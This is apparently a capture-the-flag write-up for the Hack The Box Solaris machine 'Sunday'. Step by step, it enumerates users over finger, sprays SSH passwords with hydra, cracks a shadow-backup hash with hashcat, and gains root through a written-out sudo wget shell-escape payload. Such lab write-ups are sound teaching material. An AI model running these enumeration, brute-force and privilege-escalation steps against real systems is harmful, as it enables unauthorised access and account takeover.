Sunday HTB

Solaris Machine

IP

10.10.10.76

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.76 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

79,111,515,6787,22022

Lets run a more in-depth scan of these ports

sudo nmap -sCV -p79,111,515,6787,22022 10.10.10.76 -oA nmap_results

results

PORT      STATE SERVICE VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=12/19%Time=65814E2D%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x2
SF:0\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x
SF:20\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?
SF:\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where
SF:\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x2
SF:0\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x
SF:20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(S
SF:SLSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20
SF:\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x2
SF:0\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.47 seconds

finger running on port 79 looks interesting lets start here

What is finger

• is a network protocol used for querying information about users within a network

• typically runs on port 79

• Essentially when a finger client connects to a finger server, a client can request information on specific users

Okay How can we attack this service

• If we can a list of possible usernames we can confirm the presence on the network using finger

Okay we don't have any possible usernames at the moment meaning we need to find them, let's check out the other services

HTTPS Port 6787

when we navigate to port 6787 in our browser we can see the following

Tried default credentials and none seemed to work, but the default credentials do seem to just follow a single name like jack for example, maybe we can create a list of usernames of common names and enumerate that through finger

enumerating basic usernames through finger

we can use the following tool

GitHub - pentestmonkey/finger-user-enum: Username guessing tool primarily for use against the default Solaris finger service. Also supports relaying of queries through another finger server.GitHub

and we will download the following wordlist git

GitHub - jeanphorn/wordlist: Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords.GitHub

Now lets enumerate for usernames

sudo ./finger-user-enum.pl -U /opt/wordlist/usernames.txt -t 10.10.10.76

Looking through the output we can see a few names

we have the names

bin
daemon
ike
lp #printer
network
no
nobody
printer
program
remote
reserve
root
sammy
sunny
user
aiuser
user

Given the names sammy and sunny seem to be the most likely human accounts lets roll with these

Now i tried to login via the Solaris login page with some common passwords but none where successful let's move to password spraying via SSH

let's create a file containing both sunny and sammy

Now lets password spray SSH

hydra -f -P /usr/share/wordlists/rockyou.txt -L usernames 10.10.10.76 ssh -s 22022

we do find a password for the user sunny

sunny sunday

• these creds also work for the solaris login page

ssh sunny@10.10.10.76 -p 22022

we have a shell on the system

Priv Esc via sunny

checking our sudo privs

sudo -l

tried to run it but dont understand what it is actually doing but could be interesting, but keep in mind this program is called troll we will revisit this later

Lets see if we can find any SUID bit set

find / -perm -u=s -type f 2>/dev/null

• Nothing interesting

when we look at the /backup we do find a shadow file backup

Lets see if we can crack sammy key and see if it is still in use

• Notice within the hash we can see the $5 this tells me this is SHA-256

hashcat -m 7400 sammyhash /usr/share/wordlists/rockyou.txt

and we find the password

sammy cooldude!

we can change users to sammy

su sammy

when we check our sudo privs we can see the following

if we check

wget | GTFOBins

we can see we can break out of our current shell and gain a root shell

TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget --use-askpass=$TF 0

we are now root